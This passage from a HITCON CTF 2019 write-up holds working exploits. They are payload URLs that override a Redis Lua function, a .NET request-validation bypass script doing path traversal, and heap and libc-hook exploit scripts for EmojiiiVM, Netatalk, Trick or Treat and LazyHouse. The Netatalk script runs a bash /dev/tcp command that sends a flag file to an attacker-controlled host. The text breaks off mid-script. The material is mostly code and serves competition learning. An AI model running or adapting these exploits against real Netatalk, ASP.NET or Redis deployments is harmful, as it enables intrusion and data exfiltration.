<h4 id="failed-attempts"><a class="header-link" href="#failed-attempts"></a>Failed Attempts</h4>
<ul class="list">
<li>snprintf overwrite: The SQL query is built using snprintf, but we can overwrite the last single quote here. The query will become <code>select * from users where name like &#39;%aaaaaa%</code> which leads to SQL error. However, this is useless......</li>
<li>Using GoAhead 1-day or CVEs: like embedthis/goahead Issue <a href="https://github.com/embedthis/goahead/issues/264">264</a> and <a href="https://github.com/embedthis/goahead/issues/285">285</a>, but I feel like they are not actually exploitable. (and I don&#39;t have any pwn skills)</li>
<li>brute-force the temp filename to become <code>foobar.so</code>: The webserver will create a tempfile for stdio/out. However, the filename, especially the extension, is not controllable. Check the <a href="https://github.com/embedthis/goahead/blob/029ea72c871f1dced9e9a7bd1ff9cc0a003fd4ca/src/osdep.c#L66">source code</a> here.</li>
<li>Using existing library <code>*.so</code> on the server with environment variables to RCE: The only interesting library is <code>libmemusage</code>. Loading this library shows the memory usage of the program. However they don&#39;t seem to be useful here.</li>
</ul>
<h3 id="luatic"><a class="header-link" href="#luatic"></a>Luatic</h3>
<p>The server source code is <a href="https://github.com/orangetw/My-CTF-Web-Challenges/blob/master/hitcon-ctf-2019/luatic/luatic.php">here</a>.</p>
<p>Each team in this CTF will be assigned a unique token, which can be used in this challenge to create an independent Redis server.</p>
<h4 id="overwrite-varibles"><a class="header-link" href="#overwrite-varibles"></a>Overwrite varibles</h4>
<p>The first part is to overwrite PHP varibles. Let&#39;s focus on this code:</p>
<pre class="hljs"><code>    <span class="hljs-keyword">foreach</span>($_REQUEST <span class="hljs-keyword">as</span> $k=&gt;$v) {
        <span class="hljs-keyword">if</span>( strlen($k) &gt; <span class="hljs-number">0</span> &amp;&amp; preg_match(<span class="hljs-string">'/^(FLAG|MY_|TEST_|GLOBALS)/i'</span>,$k)  )
            <span class="hljs-keyword">exit</span>(<span class="hljs-string">'Shame on you'</span>);
    }

    <span class="hljs-keyword">foreach</span>(<span class="hljs-keyword">Array</span>(<span class="hljs-string">'_GET'</span>,<span class="hljs-string">'_POST'</span>) <span class="hljs-keyword">as</span> $request) {
        <span class="hljs-keyword">foreach</span>($$request <span class="hljs-keyword">as</span> $k =&gt; $v) ${$k} = str_replace(str_split(<span class="hljs-string">"[]{}=.'\""</span>), <span class="hljs-string">""</span>, $v);
    }</code></pre><p>It will extract GET and POST parameters and simply create a PHP varaible and assign to it. However, the annoying WAF will block any attempt to create any varaible starting with <code>MY_</code>. @kaibro found the trick here: the for-each loop firstly parses <code>_GET</code> and then <code>_POST</code>. What if we name our varaible as <code>_POST</code> and put it in <code>_GET</code>? It will parse this one in <code>_GET</code>  and add our varaible into <code>_POST</code>!</p>
<pre class="hljs"><code>example.com/?_POST[guess]=123

# First, <span class="hljs-keyword">parse</span> <span class="hljs-variable">$_GET</span>
<span class="hljs-variable">$_POST</span> = Array(<span class="hljs-string">"guess"</span> =&gt; 123);

# Second, <span class="hljs-keyword">parse</span> <span class="hljs-variable">$_POST</span>, <span class="hljs-keyword">which</span> has been overwritten previously
<span class="hljs-variable">$guess</span> = 123;</code></pre><p><a href="https://xz.aliyun.com/t/5676#toc-4">Reference (in Simplified Chinese)</a>.</p>
<h4 id="redis-and-lua"><a class="header-link" href="#redis-and-lua"></a>Redis and Lua</h4>
<p>Thus, we can control the <code>$MY_SET_COMMAND</code> now. The next target is the redis server and Lua interpreter. We have to somehow find an approach to predict the random value.</p>
<p>The PHP code seems to use <a href="https://github.com/phpredis/phpredis">phpredis</a> library. We could probably inject command in <code>rawCommand</code> function call, but our objective is in the Lua interpreter.</p>
<p>Let&#39;s gather some information for this Lua interpreter in Redis.</p>
<ol class="list">
<li><a href="https://redis.io/commands/eval#atomicity-of-scripts">Redis uses the same Lua interpreter to run all the commands.</a> </li>
<li>sandboxing: Lua interpreter in Redis <a href="https://redis.io/commands/eval#sandbox-and-maximum-execution-time">is sandboxed</a>. The <a href="https://redis.io/commands/eval#available-libraries">available modules</a> are pretty limited. RCE will be difficult.</li>
<li><a href="https://redis.io/commands/eval#scripts-as-pure-functions">replication</a>: The Lua script has to be a stateless pure function. It should not depend on any internal state. Basically what redis want is the Lua script should return the same value for each call.</li>
<li><a href="https://redis.io/commands/eval#global-variables-protection">not allow global varaibles</a>: This is a similar mechanism as the previous one. You should not keep state inside the Lua engine.</li>
</ol>
<p>Even with those limitations, we still try to overwrite <code>math.random</code> function call. After some searching I got <a href="https://stackoverflow.com/questions/19997647/script-attempted-to-create-global-variable">this</a>, so I think if it&#39;s possible to create a global variable, it should not be hard to overwrite one.</p>
<p>Therefore, we just overwrite <code>math.random</code> like this in redis.</p>
<pre class="hljs"><code><span class="hljs-built_in">eval</span> <span class="hljs-string">"function math:random() return 87 end"</span> <span class="hljs-number">0</span></code></pre><p>Here is the final payload. Because the server will check if the key exists in redis or not, we have to set that one in redis first:</p>
<pre class="hljs"><code><span class="hljs-link">http://54.250.242.183/luatic.php?token=mytoken&amp;_POST</span>[<span class="hljs-string">guess</span>]=87&amp;<span class="hljs-emphasis">_POST[TEST_</span>KEY]=function%20math%3Arandom()%20return%2087%20end&amp;<span class="hljs-emphasis">_POST[TEST_</span>VALUE]=0</code></pre><p>Then overwrite the function. The return value will be fixed.</p>
<pre class="hljs"><code><span class="hljs-link">http://54.250.242.183/luatic.php?token=052e31ea-dc02-48ea-8e76-e277c4b03c60&amp;_POST</span>[<span class="hljs-string">guess</span>]=87&amp;<span class="hljs-emphasis">_POST[MY_</span>SET<span class="hljs-emphasis">_COMMAND]=eval&amp;_</span>POST[TEST<span class="hljs-emphasis">_KEY]=function%20math%3Arandom()%20return%2087%20end&amp;_</span>POST[TEST<span class="hljs-emphasis">_VALUE]=0</span></code></pre><p>Flag: <code>hitcon{Lua^H Red1s 1s m4g1c!!!}</code></p>
<h3 id="buggy-.net"><a class="header-link" href="#buggy-.net"></a>Buggy .NET</h3>
<p>flag is in the <code>C:\FLAG.txt</code></p>
<p>Thus we need to bypass <code>..</code> restriction to read files.</p>
<p>And in one year ago, I have read @irsdl&#39;s .NET WAF Bypass slide: <a href="https://www.slideshare.net/SoroushDalili/waf-bypass-techniques-using-http-standard-and-web-servers-behaviour">https://www.slideshare.net/SoroushDalili/waf-bypass-techniques-using-http-standard-and-web-servers-behaviour</a></p>
<p>The example code in the slide is almost same as this challenge. </p>
<p>We just need to throw an exception when we use <code>Request.Form[&quot;filename&quot;]</code> first time.</p>
<p>But I tried a lot of charset tricks (IBM500, IBM037, ...) and it never throw any exception.</p>
<p>So I started to read the .NET source code, and I found that we should use some malicious payload (e.g. XSS) to trigger the Request Validation exception.</p>
<p>(The function calling chain looks like: <code>Form.get</code> -&gt; <code>ValidateHttpValueCollection</code> -&gt; <code>collection.EnableGranularValidation</code> -&gt; <code>ValidateString</code> -&gt; <code>RequestValidator.Current.IsValidRequestString</code> -&gt; <code>rossSiteScriptingValidation.IsDangerousString</code> -&gt; <code>throw new HttpRequestValidationException</code>)</p>
<p>And it validated the Form data only once, so it will not throw any exception when we called it in the second time.</p>
<pre class="hljs"><code><span class="hljs-keyword">public</span> NameValueCollection <span class="hljs-keyword">Form</span> {
    get {
        EnsureForm();

        <span class="hljs-keyword">if</span> (_flags[needToValidateForm]) {
            _flags.Clear(needToValidateForm);
            ValidateHttpValueCollection(_form, RequestValidationSource.<span class="hljs-keyword">Form</span>);
        }

        <span class="hljs-keyword">return</span> _form;
    }
}</code></pre><p>Here is my exploit script:</p>
<pre class="hljs"><code><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *
<span class="hljs-keyword">import</span> urllib

encoding = <span class="hljs-string">"utf-8"</span>

r = remote(<span class="hljs-string">"52.197.162.211"</span>, <span class="hljs-number">80</span>)

s = <span class="hljs-string">'filename'</span>
print(s)
res1 = (urllib.quote_plus(s.encode(encoding)))
l1 = len(res1)

<span class="hljs-comment">#s = 'web.config'</span>
s = <span class="hljs-string">'../../../../FLAG.txt'</span>
print(s)
res2 = (urllib.quote_plus(s.encode(encoding)))
l2 = len(res2)

print(res1 + <span class="hljs-string">"="</span> + res2)
print(<span class="hljs-string">"Length: "</span>, l1 + l2 + <span class="hljs-number">1</span>)

s = <span class="hljs-string">"&lt;script&gt;alert(123)&lt;/script&gt;"</span>
shit = <span class="hljs-string">"&amp;x="</span> + urllib.quote_plus(s.encode(encoding))

payload = <span class="hljs-string">'''GET / HTTP/1.1
Host: 52.197.162.211
Content-Type: application/x-www-form-urlencoded
Content-Length: {}

{}'''</span>.format(l1 + l2 + <span class="hljs-number">1</span> + len(shit), res1 + <span class="hljs-string">"="</span> + res2 + shit).replace(<span class="hljs-string">"\n"</span>, <span class="hljs-string">"\r\n"</span>)


r.send(payload)

r.interactive()</code></pre><p><code>hitcon{Amazing!!! @irsdl 1s ind33d the .Net KING!!!}</code></p>
<h2 id="pwn"><a class="header-link" href="#pwn"></a>Pwn</h2>
<h3 id="poe---i"><a class="header-link" href="#poe---i"></a>PoE - I</h3>
<ul class="list">
<li><a href="https://github.com/yuawn/CTF/blob/master/2019/hitcon/PoE/poe-I.py">https://github.com/yuawn/CTF/blob/master/2019/hitcon/PoE/poe-I.py</a></li>
</ul>
<h3 id="emojiiivm"><a class="header-link" href="#emojiiivm"></a>EmojiiiVM</h3>
<ul class="list">
<li><a href="https://github.com/yuawn/CTF/tree/master/2019/hitcon/EmojiiiVM">https://github.com/yuawn/CTF/tree/master/2019/hitcon/EmojiiiVM</a></li>
</ul>
<pre class="hljs"><code><span class="hljs-comment">#!/usr/bin/env python3</span>
<span class="hljs-comment">#from pwn import *</span>
<span class="hljs-keyword">import</span> re

<span class="hljs-comment"># hitcon{H0p3_y0u_Enj0y_pWn1ng_th1S_3m0j1_vM_^_^b}</span>

<span class="hljs-string">'''
store [i] [j] [top]
load  top = mem[i][j]
'''</span>

num = [ <span class="hljs-string">'😀'</span> , <span class="hljs-string">'😁'</span>, <span class="hljs-string">'😂'</span> , <span class="hljs-string">'🤣'</span> , <span class="hljs-string">'😜'</span> , <span class="hljs-string">'😄'</span> , <span class="hljs-string">'😅'</span> , <span class="hljs-string">'😆'</span> , <span class="hljs-string">'😉'</span> , <span class="hljs-string">'😊'</span> , <span class="hljs-string">'😍'</span> ]

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">push</span><span class="hljs-params">( n )</span>:</span>
    <span class="hljs-keyword">if</span> n &lt;= <span class="hljs-number">10</span>:
        <span class="hljs-keyword">return</span> <span class="hljs-string">'⏬'</span> + num[n]
    <span class="hljs-keyword">else</span>:
        <span class="hljs-keyword">return</span>  mul( n // <span class="hljs-number">10</span> , <span class="hljs-number">10</span> ) + add( n % <span class="hljs-number">10</span> , <span class="hljs-number">-1</span> )

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">add</span><span class="hljs-params">( a , b , top = False )</span>:</span>
    <span class="hljs-keyword">if</span> b &lt; <span class="hljs-number">0</span>:
        <span class="hljs-keyword">return</span> push( a ) + <span class="hljs-string">'➕'</span>
    <span class="hljs-keyword">else</span>:
        <span class="hljs-keyword">return</span> push( b ) + push( a ) + <span class="hljs-string">'➕'</span>

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">sub</span><span class="hljs-params">( a , b )</span>:</span>
    <span class="hljs-keyword">if</span> b == <span class="hljs-number">-1</span>:
        <span class="hljs-keyword">return</span> push( b ) + push( a ) + <span class="hljs-string">'➖'</span>
    <span class="hljs-keyword">return</span> push( b ) + push( a ) + <span class="hljs-string">'➖'</span>

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">mul</span><span class="hljs-params">( a , b )</span>:</span>
    <span class="hljs-keyword">if</span> b == <span class="hljs-number">-1</span>:
        <span class="hljs-keyword">return</span> push( a ) + <span class="hljs-string">'❌'</span>
    <span class="hljs-keyword">return</span> push( b ) + push( a ) + <span class="hljs-string">'❌'</span>

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">store</span><span class="hljs-params">( i , j , v )</span>:</span>
    <span class="hljs-keyword">if</span> v == <span class="hljs-number">-1</span>:
        <span class="hljs-keyword">return</span> push(j) + push(i) + <span class="hljs-string">'📥'</span>
    <span class="hljs-keyword">if</span> type(v) == type(<span class="hljs-string">'y'</span>):
        v = ord( v )
    <span class="hljs-keyword">return</span> push(v) + push(j) + push(i) + <span class="hljs-string">'📥'</span>

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">load</span><span class="hljs-params">( i , j )</span>:</span>
    <span class="hljs-keyword">return</span> push(j) + push(i) + <span class="hljs-string">'📤'</span>

now = <span class="hljs-string">'\0'</span> * <span class="hljs-number">10</span>

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">store_str</span><span class="hljs-params">( i , s )</span>:</span>
    p = <span class="hljs-string">''</span>
    <span class="hljs-keyword">for</span> j <span class="hljs-keyword">in</span> range( len( s ) ):
        <span class="hljs-keyword">if</span> now[j] == s[j]:
            <span class="hljs-keyword">continue</span>
        p += store( i , j , s[j] )
    <span class="hljs-keyword">return</span> p

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">read</span><span class="hljs-params">( i )</span>:</span>
    <span class="hljs-keyword">return</span> push( i ) + <span class="hljs-string">'📄'</span>

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">wri</span><span class="hljs-params">( i )</span>:</span>
    <span class="hljs-keyword">return</span> push( i ) + <span class="hljs-string">'📝'</span>

pop = <span class="hljs-string">'🔝'</span>
wri_stk = <span class="hljs-string">'🔡'</span>
puti = <span class="hljs-string">'🔢'</span>

p = <span class="hljs-string">''</span>
p += ( push( <span class="hljs-number">10</span> ) + <span class="hljs-string">'🆕'</span> ) * <span class="hljs-number">6</span>
p += <span class="hljs-string">'➕'</span>
p += pop * <span class="hljs-number">9</span>
p += add( <span class="hljs-number">10</span> , <span class="hljs-number">-1</span> ) * <span class="hljs-number">15</span> <span class="hljs-comment"># 3 control 1</span>
p += add( <span class="hljs-number">2</span> , <span class="hljs-number">-1</span> )
p += pop * <span class="hljs-number">20</span>
p += puti
p += read( <span class="hljs-number">3</span> )
p += read( <span class="hljs-number">1</span> )
p += push( <span class="hljs-number">10</span> ) + <span class="hljs-string">'🆕'</span>
p += <span class="hljs-string">'🛑'</span>

o = open( <span class="hljs-string">'exp'</span> , <span class="hljs-string">'w+'</span> )
o.write( p )
o.close()</code></pre><h3 id="netatalk"><a class="header-link" href="#netatalk"></a>Netatalk</h3>
<pre class="hljs"><code>from pwn <span class="hljs-built_in">import</span> *
<span class="hljs-built_in">import</span> struct

<span class="hljs-comment">#context.log_level = "error"</span>
<span class="hljs-comment">#ip = 'localhost'</span>
<span class="hljs-attr">ip</span> = '<span class="hljs-number">3.114</span>.<span class="hljs-number">63.117</span>'
<span class="hljs-attr">port</span> = <span class="hljs-number">48763</span>
def create_header(addr):
    <span class="hljs-attr">dsi_opensession</span> = <span class="hljs-string">"\x01"</span> <span class="hljs-comment"># attention quantum option</span>
    dsi_opensession += chr(len(addr)+<span class="hljs-number">0</span>x10) <span class="hljs-comment"># length</span>
    dsi_opensession += <span class="hljs-string">"b"</span>*<span class="hljs-number">0</span>x10+addr
    <span class="hljs-attr">dsi_header</span> = <span class="hljs-string">"\x00"</span> <span class="hljs-comment"># "request" flag</span>
    dsi_header += <span class="hljs-string">"\x04"</span> <span class="hljs-comment"># open session command</span>
    dsi_header += <span class="hljs-string">"\x00\x01"</span> <span class="hljs-comment"># request id</span>
    dsi_header += <span class="hljs-string">"\x00\x00\x00\x00"</span> <span class="hljs-comment"># data offset</span>
    dsi_header += struct.pack(<span class="hljs-string">"&gt;I"</span>, len(dsi_opensession))
    dsi_header += <span class="hljs-string">"\x00\x00\x00\x00"</span> <span class="hljs-comment"># reserved</span>
    dsi_header += dsi_opensession
    return dsi_header

def create_afp(idx,payload):
    <span class="hljs-attr">afp_command</span> = chr(idx) <span class="hljs-comment"># invoke the second entry in the table</span>
    afp_command += <span class="hljs-string">"\x00"</span> <span class="hljs-comment"># protocol defined padding </span>
    afp_command += payload
    <span class="hljs-attr">dsi_header</span> = <span class="hljs-string">"\x00"</span> <span class="hljs-comment"># "request" flag</span>
    dsi_header += <span class="hljs-string">"\x02"</span> <span class="hljs-comment"># "AFP" command</span>
    dsi_header += <span class="hljs-string">"\x00\x02"</span> <span class="hljs-comment"># request id</span>
    dsi_header += <span class="hljs-string">"\x00\x00\x00\x00"</span> <span class="hljs-comment"># data offset</span>
    dsi_header += struct.pack(<span class="hljs-string">"&gt;I"</span>, len(afp_command))
    dsi_header += '\x00\x00\x00\x00' <span class="hljs-comment"># reserved</span>
    dsi_header += afp_command
    return dsi_header

<span class="hljs-comment">#addr = p64(0x7f9159232000-0x5357000)[:6] # brutefore address</span>
<span class="hljs-attr">addr</span> = p64(<span class="hljs-number">0</span>x7f812631d000)[:<span class="hljs-number">6</span>]
<span class="hljs-comment">#addr = ""</span>
while len(addr)&lt;<span class="hljs-number">6</span> :
    for i <span class="hljs-keyword">in</span> range(<span class="hljs-number">256</span>):
        <span class="hljs-attr">r</span> = remote(ip,port)
        r.send(create_header(addr+chr(i)))
        try:
            <span class="hljs-keyword">if</span> <span class="hljs-string">"a"</span>*<span class="hljs-number">4</span> <span class="hljs-keyword">in</span> r.recvrepeat(<span class="hljs-number">1</span>):
                addr += chr(i)
                r.close()
                break
        except:
            r.close()
    <span class="hljs-attr">val</span> = u64(addr.ljust(<span class="hljs-number">8</span>,'\x00'))
    print hex(val)
addr += <span class="hljs-string">"\x00"</span>*<span class="hljs-number">2</span>
<span class="hljs-attr">offset</span> = <span class="hljs-number">0</span>x5246000
<span class="hljs-attr">r</span> = remote(ip,port)
<span class="hljs-attr">libc</span> = u64(addr)+offset
<span class="hljs-comment">#libc=0x7fea3340b120-0x43120 # local libc offset</span>
<span class="hljs-comment">#print hex(libc)</span>
<span class="hljs-comment">#print hex(libc+0x3ed8e8)</span>
<span class="hljs-comment">#print hex(libc+0x3f04a8) # dl_open_hook</span>
<span class="hljs-comment">#print hex(libc+0x7EA1F)</span>
<span class="hljs-comment">#print hex(libc+0x166488)</span>
<span class="hljs-comment">#print hex(libc+0x4f440)</span>
<span class="hljs-comment">#raw_input()</span>
<span class="hljs-comment">#libc=0x7fea3340b120-0x43120</span>
<span class="hljs-comment">#setcontext+53</span>



r.send(create_header(p64(libc+<span class="hljs-number">0</span>x3ed8e8-<span class="hljs-number">0</span>x30))) <span class="hljs-comment">#  overwrite afp_command buf with free_hook-0x30 </span>
context.<span class="hljs-attr">arch</span> = <span class="hljs-string">"amd64"</span>

<span class="hljs-attr">r8=0</span>
<span class="hljs-attr">r9=1</span>
<span class="hljs-attr">r12=1</span>
<span class="hljs-attr">r13=1</span>
<span class="hljs-attr">r14=1</span>
<span class="hljs-attr">r15=1</span>
<span class="hljs-attr">rdi=libc+0x3ed8e8+8</span> <span class="hljs-comment"># cmd buffer</span>
<span class="hljs-attr">rsi=0x1111</span>
<span class="hljs-attr">rbp=0x1111</span>
<span class="hljs-attr">rbx=0x1111</span>
<span class="hljs-attr">rdx=0x1211</span>
<span class="hljs-attr">rcx=0x1211</span>
<span class="hljs-attr">rsp=libc+0x3ed8e8</span>
<span class="hljs-attr">rspp=libc+0x4f440</span> <span class="hljs-comment"># system</span>
<span class="hljs-attr">payload2=flat(</span>
r8,r9,
<span class="hljs-number">0</span>,<span class="hljs-number">0</span>,r12,r13,r14,r15,rdi,rsi,rbp,rbx,rdx,<span class="hljs-number">0</span>,rcx,rsp,rspp
)
<span class="hljs-attr">rip="X.X.X.X"</span>
<span class="hljs-attr">rport=11112</span>
<span class="hljs-attr">cmd='bash</span> -c <span class="hljs-string">"cat /home/ctf/flag &gt; /dev/tcp/%s/%d"</span> \x00' % (rip,rport) <span class="hljs-comment"># cat flag to controled ip and port </span>
<span class="hljs-attr">payload</span> = flat(<span class="hljs-string">"\x00"</span>*<span class="hljs-number">0</span>x2e+p64(libc+<span class="hljs-number">0</span>x166488)+cmd.ljust(<span class="hljs-number">0</span>x2bb8,<span class="hljs-string">"\x00"</span>)+p64(libc+<span class="hljs-number">0</span>x3f04a8+<span class="hljs-number">8</span>)+p64(libc+<span class="hljs-number">0</span>x7EA1F)*<span class="hljs-number">4</span>+p64(libc+<span class="hljs-number">0</span>x52070+<span class="hljs-number">53</span>)+payload2) <span class="hljs-comment">#over write _free_hook and _dl_open_hook</span>
r.send(create_afp(<span class="hljs-number">0</span>,payload))
r.send(create_afp(<span class="hljs-number">18</span>,flat(
    <span class="hljs-string">""</span>
)))


r.interactive()</code></pre><h3 id="🎃-trick-or-treat-🎃"><a class="header-link" href="#🎃-trick-or-treat-🎃"></a>🎃 Trick or Treat 🎃</h3>
<pre class="hljs"><code><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *

<span class="hljs-comment">#r = process(["./trick_or_treat"])</span>

r = remote(<span class="hljs-string">"3.112.41.140"</span>, <span class="hljs-number">56746</span>)
r.sendlineafter(<span class="hljs-string">":"</span>,str(<span class="hljs-number">0x1000000</span>))
r.recvuntil(<span class="hljs-string">":"</span>)
libc = int(r.recvline(),<span class="hljs-number">16</span>)+<span class="hljs-number">0x1000ff0</span>
<span class="hljs-keyword">print</span> hex(libc)
offset = <span class="hljs-number">0x1000ff0</span>
r.sendlineafter(<span class="hljs-string">":"</span>,hex((offset+<span class="hljs-number">0x3ed8e8</span>)/<span class="hljs-number">8</span>))
r.sendline(<span class="hljs-string">" "</span>+hex(libc+<span class="hljs-number">0x4f440</span>))
r.sendafter(<span class="hljs-string">":"</span>,<span class="hljs-string">"a"</span>*<span class="hljs-number">0x400</span>)
r.sendline(<span class="hljs-string">""</span>)
r.sendline(<span class="hljs-string">"ed"</span>)
r.sendline(<span class="hljs-string">"!sh"</span>)
r.interactive()</code></pre><h3 id="lazyhouse"><a class="header-link" href="#lazyhouse"></a>LazyHouse</h3>
<pre class="hljs"><code><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *

<span class="hljs-comment">#r = process(["./lazyhouse"])</span>
r = remote(<span class="hljs-string">"3.115.121.123"</span>, <span class="hljs-number">5731</span>)
<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">buy</span><span class="hljs-params">(idx,size,house)</span>:</span>
    r.sendlineafter(<span class="hljs-string">":"</span>,<span class="hljs-string">"1"</span>)
    r.recvuntil(<span class="hljs-string">":"</span>)
    r.sendlineafter(<span class="hljs-string">":"</span>,str(idx))
    r.sendlineafter(<span class="hljs-string">":"</span>,str(size))
    r.recvuntil(<span class="hljs-string">":"</span>)
    <span class="hljs-keyword">if</span> size &lt; <span class="hljs-number">0xffffffff</span>:
        r.sendafter(<span class="hljs-string">":"</span>,house)

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">show</span><span class="hljs-params">(idx)</span>:</span>
    r.sendlineafter(<span class="hljs-string">":"</span>,<span class="hljs-string">"2"</span>)
    r.sendlineafter(<span class="hljs-string">":"</span>,str(idx))

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">remove</span><span class="hljs-params">(idx)</span>:</span>
    r.sendlineafter(<span class="hljs-string">":"</span>,<span class="hljs-string">"3"</span>)
    r.sendlineafter(<span class="hljs-string">":"</span>,str(idx))


<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">Upgrade</span><span class="hljs-params">(idx,house)</span>:</span>
    r.sendlineafter(<span class="hljs-string">":"</span>,<span class="hljs-string">"4"</span>)
    r.sendlineafter(<span class="hljs-string">":"</span>,str(idx))
    r.sendafter(<span class="hljs-string">":"</span>,house)

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">Super</span><span class="hljs-params">(house)</span>:</span>
    r.sendlineafter(<span class="hljs-string">":"</span>,<span class="hljs-string">"5"</span>)
    r.sendafter(<span class="hljs-string">":"</span>,house)



buy(<span class="hljs-number">0</span>,<span class="hljs-number">84618092081236480</span>,<span class="hljs-string">"a"</span>)
remove(<span class="hljs-number">0</span>)
buy(<span class="hljs-number">0</span>,<span class="hljs-number">0x80</span>,<span class="hljs-string">"a"</span>)
buy(<span class="hljs-number">1</span>,<span class="hljs-number">0x500</span>,<span class="hljs-string">"a"</span>)
buy(<span class="hljs-number">2</span>,<span class="hljs-number">0x80</span>,<span class="hljs-string">"a"</span>)
remove(<span class="hljs-number">1</span>)
buy(<span class="hljs-number">1</span>,<span class="hljs-number">0x600</span>,<span class="hljs-string">"a"</span>)
Upgrade(<span class="hljs-number">0</span>,<span class="hljs-string">"\x00"</span>*<span class="hljs-number">0x88</span>+p64(<span class="hljs-number">0x513</span>))
buy(<span class="hljs-number">7</span>,<span class="hljs-number">0x500</span>,<span class="hljs-string">"a"</span>)
show(<span class="hljs-number">7</span>)
data = r.recvn(<span class="hljs-number">0x500</span>)
libc =  u64(data[<span class="hljs-number">0x8</span>:<span class="hljs-number">0x10</span>])<span class="hljs-number">-0x1e50d0</span>
heap = u64(data[<span class="hljs-number">0x10</span>:<span class="hljs-number">0x18</span>])<span class="hljs-number">-0x2e0</span>
<span class="hljs-keyword">print</span> hex(libc)
<span class="hljs-keyword">print</span> hex(heap)

remove(<span class="hljs-number">0</span>)
remove(<span class="hljs-number">1</span>)
remove(<span class="hljs-number">2</span>)
size = <span class="hljs-number">0x1a0</span>+<span class="hljs-number">0x90</span>
target = heap+<span class="hljs-number">0x8b0</span>
buy(<span class="hljs-number">6</span>,<span class="hljs-number">0x80</span>,<span class="hljs-string">"\x00"</span>*<span class="hljs-number">8</span>+p64(size+<span class="hljs-number">1</span>)+p64(target<span class="hljs-number">-0x18</span>)+p64(target<span class="hljs-number">-0x10</span>)+p64(target<span class="hljs-number">-0x20</span>))
buy(<span class="hljs-number">5</span>,<span class="hljs-number">0x80</span>,<span class="hljs-string">"a"</span>)
buy(<span class="hljs-number">0</span>,<span class="hljs-number">0x80</span>,<span class="hljs-string">"a"</span>)
buy(<span class="hljs-number">1</span>,<span class="hljs-number">0x80</span>,<span class="hljs-string">"a"</span>)
buy(<span class="hljs-number">2</span>,<span class="hljs-number">0x600</span>,<span class="hljs-string">"\x00"</span>*<span class="hljs-number">0x508</span>+p64(<span class="hljs-number">0x101</span>))
Upgrade(<span class="hljs-number">1</span>,<span class="hljs-string">"\x00"</span>*<span class="hljs-number">0x80</span>+p64(size)+p64(<span class="hljs-number">0x610</span>))
remove(<span class="hljs-number">2</span>)
context.arch = <span class="hljs-string">"amd64"</span>
size = <span class="hljs-number">0x6c0</span>
buy(<span class="hljs-number">2</span>,<span class="hljs-number">0x500</span>,<span class="hljs-string">"\x00"</span>*<span class="hljs-number">0x78</span>+flat(size+<span class="hljs-number">1</span>,[<span class="hljs-number">0</span>]*<span class="hljs-number">17</span>)+
        flat(<span class="hljs-number">0x31</span>,[<span class="hljs-number">0</span>]*<span class="hljs-number">5</span>,<span class="hljs-number">0x61</span>,[<span class="hljs-number">0</span>]*<span class="hljs-number">11</span>,<span class="hljs-number">0x21</span>,[<span class="hljs-number">0</span>]*<span class="hljs-number">3</span>,<span class="hljs-number">0x71</span>,[<span class="hljs-number">0</span>]*<span class="hljs-number">13</span>))
remove(<span class="hljs-number">0</span>)
remove(<span class="hljs-number">1</span>)
remove(<span class="hljs-number">2</span>)


buy(<span class="hljs-number">0</span>,<span class="hljs-number">0x1a0</span>,p64(<span class="hljs-number">0</span>)*<span class="hljs-number">15</span>+p64(<span class="hljs-number">0x6c1</span>))
buy(<span class="hljs-number">1</span>,<span class="hljs-number">0x210</span>,<span class="hljs-string">"a"</span>)

buy(<span class="hljs-number">2</span>,<span class="hljs-number">0x210</span>,<span class="hljs-string">"a"</span>)
remove(<span class="hljs-number">2</span>)
buy(<span class="hljs-number">2</span>,<span class="hljs-number">0x210</span>,<span class="hljs-string">"\x00"</span>*<span class="hljs-number">0x148</span>+p64(<span class="hljs-number">0xd1</span>))
remove(<span class="hljs-number">2</span>)
<span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> range(<span class="hljs-number">5</span>):
    buy(<span class="hljs-number">2</span>,<span class="hljs-number">0x210</span>,<span class="hljs-string">"a"</span>)
    remove(<span class="hljs-number">2</span>)

buy(<span class="hljs-number">2</span>,<span class="hljs-number">0x3a0</span>,<span class="hljs-string">"a"</span>)
remove(<span class="hljs-number">2</span>)


remove(<span class="hljs-number">1</span>)
buy(<span class="hljs-number">1</span>,<span class="hljs-number">0x220</span>,<span class="hljs-string">"a"</span>)
remove(<span class="hljs-number">5</span>)
buy(<span class="hljs-number">5</span>,<span class="hljs-number">0x6b0</span>,<span class="hljs-string">"\x00"</span>*<span class="hljs-number">0xa0</span>+p64(heap+<span class="hljs-number">0x40</span>)+<span class="hljs-string">"\x00"</span>*<span class="hljs-number">0x80</span>+p64(<span class="hljs-number">0x221</span>)+p64(libc+<span class="hljs-number">0x1e4eb0</span>)+p64(heap+<span class="hljs-number">0x40</span>))
remove(<span class="hljs-number">1</span>)
buy(<span class="hljs-number">1</span>,<span class="hljs-number">0x210</span>,<span class="hljs-string">"a"</span>*<span class="hljs-number">0x18</span>+flat(
<span class="hljs-string">"/home/lazyhouse/flag"</span>.ljust(<span class="hljs-number">0x20</span>,<span class="hljs-string">"\x00"</span>),
libc+<span class="hljs-number">0x26542</span>,heap+<span class="hljs-number">0xa88</span><span class="hljs-number">-0x20</span>,libc+<span class="hljs-number">0x26f9e</span>,<span class="hljs-number">0</span>,libc+<span class="hljs-number">0x47cf8</span>,<span class="hljs-number">2</span>,libc+<span class="hljs-number">0x00cf6c5</span>,
